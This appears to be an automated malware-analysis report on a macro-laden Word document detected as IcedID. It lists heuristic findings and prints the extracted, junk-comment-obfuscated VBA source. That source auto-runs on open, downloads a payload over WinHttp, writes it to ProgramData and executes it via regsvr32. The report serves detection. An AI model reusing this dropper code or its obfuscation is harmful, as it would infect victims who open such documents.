MALICIOUS
290
Risk Score
Heuristics 7
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set vzIbW = CreateObject(DdPmr + "." + "shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set AzWWq = VBA.CreateObject(Jysec + "" + lmfen) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13547 bytes |
SHA-256: 4e1153da735e8528aa432cba40b7152e82d0028a8afa2d1fcb1391f73391b354 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "nxdYk"
Sub KhJWS(eQZHj, Optional ByVal wBKqq As String = "c:\programdata\ZNFbV.txt", Optional ByVal lmfen As String = "systemobject")
' Creeps gorged
' Expostulation blithe
' Pions frolicsome
' Horsehair telephoning tweaks
' Mandrake
' Mauve infective aestheticism dovetails
' Aortas prancer
' Leverage specialists trackways equipped typeless
' Launder hamstrings
' Interrogated refreshment eyelid planking
' Raids franks oblongs proportionally isotopes
' Owner imparted
' Versatile picaresque ganger newlywed attained
' Height ambler exhibits serological foremost
' Wallpaper prioritised supplemental overdraft
' Gnaws pandemic defused deleter impacts passageways workforce
' Bacterium humiliation
' Carnivals daubing nevertheless
' Haematuria pestilent jonah uninviting
' Customarily landmarks hybridisation
' Informers bakers
' Architecture selfportraits
' Striping tartness interrogators aisle
Set AzWWq = VBA.CreateObject(Jysec + "" + lmfen)
' Zeolite blabbering lapdog spellbinder
' Orangutan anemic whichever
' Tempi disfigures yap tortured
' Imbedded breakdowns disciplinarian
' Portfolio interviewed enfranchised
' Logician lamination
Set rqZwZ = AzWWq.CreateTextFile(wBKqq)
' Butterfat unwieldy handsets crusading jerkins causes
' Retitled cleaned accommodations songbirds
' Gals aqueduct duplicator
' Hypertext reoccupation prohibitive automatics monochromatic drags
' Abolitionists overlord starlit realignments
' Strangeness herbivore
rqZwZ.WriteLine eQZHj
' Thankful colonnade
' Plasticity relive absence
' Breeders unshakable shaking
' Sashes attacked
' Invectives
rqZwZ.Close
' Trenching berate
' Inspiration calorimeter firs
' Multiplicities producers assembly frostily azimuth reproachfully
' Murderess alembic fatted blower
' Ochres progressed knees
' Ambrosia breadboard inexpressibility unequally
' Covered pops plenty rafting
' Cove layouts unchallenged noiselessly captains
' Epistemological
' Zeolites prosperity stealth douche
' Inveigle beige stinted picnicking
' Tarn begrudge absconding microwaves
' Organism
' Pep bluster encoded untarnished raisin
' Tearfully vacuum mothballs dwindling
' Exults impossibility
' Anomalies amenities breweries whisperers
' Shindig recirculate
' Beats usability vicarages peelers
' Strokes simply
' Implants militates bent topically bunk acolytes amman
' Consumption briar bowdlerisation fluctuation
' Policewomen revolvers crutches chorea recirculating
' Cretinous injustice interfacing basting unearthing whittling
' Houseroom
' Bevelling contrastingly inadvertence coplanar
' Approvals retentions retina scaffolds
' Redemption rigs suffocating ramshackle scholar
' Conjugates
' Orangutan likeness
' Coax trinkets deer exchange
' Climb repast
' Invocations wellformed
' Feverishly remainder cloudiest
' Encapsulates lightness cliches rainbow rills
' Ascendant spooned tinkle
' Sank
End Sub
' Bub flagellate atoms enfolded
' Coincidence
' Epiphenomenon tress irredeemably impermeability
' Idiolect
' Rebutting dropped acoustics couplers
' Proteins closer apprehended reiteration booing theoretically
' Shaker mysterious aide correspondingly salmons
' Sorely upholds
Sub AutoOpen()
' Matriculation dawdled voting transgressing
' Misdoing panelling bloodstained
' Dodges
' Bulky
' Untalented cauliflowers bleeped mistreatment ethane inventions
' Clingers fearless
' Exhilarate
' Animism reverberating
' Strayed undemanding guidelines
' Spitting grasshopper
' Averaging unearthed bruising
' Nullity rarer unplugging magnanimity believe
' Quaff
' Dreariness ecosystems appease
' Mixup rumours
' Scintillator suns surprised clawing
' Bothers
' Internationalist basilica proverbs unusable
' Spoofs thoughtlessly angular
' Woodsmoke penalise pitbull
' Employer megaphone heap imminent federalism
' Crossroads
' Abducts etudes biometric
' Starstruck containment
' Confine intensity
' Doggy boaster polypeptide flounced bull callup
' Costliness eardrops embraced predatory adapter bucketfuls
' Latino overcoming fiddler drily
' Potpourri libeler beret albums coxswain
' Limiting amendment spawned
Dim IDqer As New sMjuH
' Tariff reciprocals luggage bracelets underdog
' Bequests hoards instantaneous
' Wag byproducts
' Corrugated antagonised
' Talent needling compositions
' Punctate bounty
' Goon abridged roundish
OsICy = ""
' Expansionism godmothers charabanc
' Swim hoovering televised
' Drainer kidnappers
' Tapdance recondite dangled triffid flustered
' Expounding satchels stark unauthorised
' Vista titre
' Unlabelled grovelled carousel intimidation katydid
' Divine mobbish
' Butlers systematise
' Fiercer innovated summertime
' Populate scarves haemorrhoid
' Victimless dun
eQZHj = IDqer.rgqDx(DFMHm)
' Sheer retelling blunder doubter
' Smallscale arithmetical
' Toadies faithless eyes
' Hydrogenated graininess encouraged
' Busmen instinctual experimentalists cornets madness
KhJWS jROSz(eQZHj)
' Acidic watercooled fuzzed welter
' Ideals setting
' Retied veal
' Bilabial protestant acetates unpolished headwinds conflictual
' Guppies godless
' Hairdressers
' Veteran morphogenesis benches
' Surpasses demeans
' Rutted mutates colourise reckoned
' Cultural undersea
' Teenage newer
' Ours alcohol
' Inverts unflinchingly hayfever arm greenest
' Agony misrepresents subscriber sillier satisfies
XqLAi eXcEB(0) + "vr32 c:\programdata\ZNFbV.txt", "wscript"
End Sub
Function pVvNq(uFcLV, zZanU)
' Anything hatred shackled buffets catapults
' Wildernesses scandalous nylons exultantly accommodated aristocracy lawsuit
' Corkscrew
' Suckling
' Crowd safest
' Mallard
' Posters looser signature manifesting
pVvNq = Split(uFcLV, zZanU)
End Function
Attribute VB_Name = "SKYTG"
' Veins obtrusiveness hunching mattering darted sprucing
' Boos reapplying ceremonial lowly chopped miscellaneous
' Synod unrevised bridled designed
' Stiffness modulator garnet mention provocative dissections
' Exacerbated reckoner frogmen diastolic treasons
' Shoguns
Function jROSz(gYluG)
' Freeholders minors aftereffects diffuser
' Subdivides plasticity luxuriance dons freshens lipped
' Meridional diffidently conformed
' Watermelons
jROSz = StrConv(gYluG, vbUnicode)
' Subsystem ancestral
' Bitchiness manners falsebay retained
' Mittens conventional cloaking
' Soot
' Curfew floodlight stabbed abstain
End Function
' Roused apparatchiks
' Pelt understaffed gentlefolk
' Shoppers crossreferences newsstand unloose feudist tombs comprised
' Expository cheekbones specificness
' Whom browbeaten outrigger raccoons
' Dentures accentuate lovelies
' Auger repaint speed dumbfounded narcotic worthwhile
Function jVXrv()
' Confident peripheries nugget
' Tormentor dithers deterred
' Bibles platter rhombic loving
' Speakers one blinder ampule intensely jakarta
' Exhibitors vegetarianism stripier
' Gothic
' Examiner
' Spiritual householders asbestos
' Audit mistakes drum
With ActiveDocument.shapes(1)
jVXrv = .AlternativeText
End With
End Function
' Marshals presents autocratically sidereal
' Junkies chateau firstborns acrid
' Libel ghost warnings diaspora bafflement cornucopia
' Directors
' Impaling canberra bazaars pipers
Function eXcEB(GBitH)
' Preparations cain laboured
' Netball
' Trusteeship niceties compassed resource
' Belgian exact seemingly
' Consideration complainant amputation
' Chordal glassful
' Temporal verge picnicking claymore
' Reposition
YcMxX = pVvNq(jVXrv(), "~~~")
pyDGN = YcMxX(GBitH)
eXcEB = pyDGN
End Function
Attribute VB_Name = "sMjuH"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function vodKe(XIXIF, JQDRi, bGmQT)
' Varieties athens
' Strength asthma playwright indigestion
' Aerial revelation
' Scaremongering typicality evadable insulated
' Quite
vodKe = Mid(XIXIF, JQDRi, bGmQT)
End Function
Public Function Basbh(Yxhvu, YXiMN)
' Furniture fierce
' Kalif monopolises
' Subgroup penetration fruitless
' Monotheist spate rubies hyphenation
' Interacting foolishly crime underexploited
' Stockholders
' Logistical yardstick flaps recover unearthly playmates slay
' Cowslip granny
' Their marshals
' As graveyards ceremony gravitating hoaxes
' Frailest transferable shipwrecks elite psychologists
' Screamingly lobotomist bore
' Census
' Graciously vocational crops prevue
' Vacuole plasmids implants caveman
' Commentary leap
' Sandbank pocks quibbles
' Olympiad disinclination
EUohn = Trim(Yxhvu)
For pMllf = YXiMN To Len(EUohn)
Khytp = vodKe(EUohn, pMllf, YXiMN) & Khytp
Next pMllf
Basbh = Khytp
End Function
' Eyes recurrent recalculation chromatic
' Undecorated impulsion radian
' Discounting powerboat laurels biliary
' Burliest gentler ineffective mangers
' Unapproved peroxides departer phantasy
Function rgqDx(nGXEQ)
' Deuced marchioness alliteration revolutionary blondes
' Hypnotherapy mobilises hangman analysis
' Legislate sinecure coastline pampered
' Ascribed delimited
Dim nyAPD As Object
' Cobbling leaching confusingly chicks recital
' Mystic facing
' Forger trudges underestimating remodelled sensitivity applicants disorderly
' Hearers
' Monolithic barrage prototypical
' Modality moms litre equated
' Targeted narcoleptic
' Regrading lurking facilitate
' Vacuous persistent
' Morph envoy deflating dealt offset attends
' Obstruction
Set nyAPD = CreateObject(Basbh(nGXEQ, 1) + "." + Basbh(nGXEQ, 1) + "Request.5.1")
' Diminutives derangement
' Boy generously incombustible avian
' Trumpeter israelis determinations
' Steeples lifestyles
' Augite mortify coy dyne
' Maddeningly pragmatics parrying spirited
' Symbolist eleven bristles spellable
' Isthmus realise perfidious gnu
' Coble psychological autographed
' Hatstands totalling dipsomaniac fevers
' Incinerate glide skipper
' Ergo reopens funniest craggy
' Bedlinen imperturbably fractionally
' Lolling sinks microbes spectrogram wronger typeless
' Redecorating spyglass
' Interludes muons
' Mango loafs satyr lefthanded
' Criticism plovers sinning
' Cellophane reclaimed dribble bedmaker bulkhead
' Two weighbridge drum crackable
SkVnp = eXcEB(1)
' Junkmail swats quince hunting brighteyed technicians
' Paginal chart tickling scrutiny cove sickbay
' Reconvened reaches politeness
' Carmine disagreed watchers hypothetically electrodynamics
' Avoiding equivalence huntsmen reek journeyed disconsolation resharpening ultrasonic
' That invariably effect
' Overdubbing birdie foreshadow surfactants cleaners prodigiously
nyAPD.Open "GET", Basbh(SkVnp, 1), False
' Coincidental anecdote ovals
' Ignores tillers bind depicted
' Pockets telephonist comedies milking
' Unkempt
' Dracone riffle
' Jammed
nyAPD.Send
' Thousandths rebelliously
' Splinter bulldogs billiards garment
' Regime meaning lector
' Unsubsidised gasps
' Deodorant flanks swindler
' Miracles muggy impassable
' Hereby agitators statuette anaconda vitriolic
rgqDx = nyAPD.responsebody
End Function
Attribute VB_Name = "CMISG"
Public Const DFMHm As String = "ptthniw"
Public Const Jysec As String = "scripting.file"
Sub XqLAi(guksZ, DdPmr)
' Aside boldly augurs disgusts
' Caps succinctly characteristically wagon repressions
' Conversely sirloins lecherousness paternalist foreman
' Lucre terminate
' Celebrants
Set vzIbW = CreateObject(DdPmr + "." + "shell")
' Deeps daft
' Quartile evaluative
' Beaches protestor selfportrait unbarred delude conglomerate
' Half visual
' Crap humanoids
' Proxies
' Tin
' Shudder tonic ganger overreacted
' Smalltown padding crossroads microchips
' Apple bassoon
' Reattachment abided featured repeated
' Misrepresentations
' Starts elucidates taskmaster
' Darkest cruellest whetstone exceptions mechanisable moses
' Breathy sustains vandalism poetically observance urban
' Chiropractors refractive piths predisposing purging circumventable prosecutor
' Designational survive hydrodynamical
' Detainee want thirty undecidable
' Mill hummock burlesquing incredibly illustrations
' Staplers presidium baked retread hunchbacked swirled
' Rusted stirred
' Cruciate lotto peasantry bushier
' Overinflated intrinsically blabbering assign
' Stammering poorness auctioned
' Flippers hitchhiker
' Ices exactly debunk bootlace
' Tannins ennobles remits scaring dollar
' Drat shards
' Diabetics
' Robot
' Steeplechase acutely martyrdom
' Ambassadorial gooseberry
' Inconsiderately adequately microwaved aunt
' Steepens outshining
' Furrow fiver
' Deflates thermodynamically toppled
' Contorted teammate googly pharmacologist
' Welling circulates energised seceding
' Typesetter dinged joist
' Armoury
' Maintainers smelting quays
' Summations interpret sauce
' Meditatively conveyancing propels
Call vzIbW.exec(guksZ)
' Desiccator figuratively carefulness
' Unknowable shrimps decoder inexplicable
' Regicide rewording
' Telephoning jukebox
' Sparred cockpits circled
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 49152 bytes |
SHA-256: cb6e9f2838bfa307064a5f9d60840c0df6821fcbacd7d27d80b9383c4d4b5656 |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.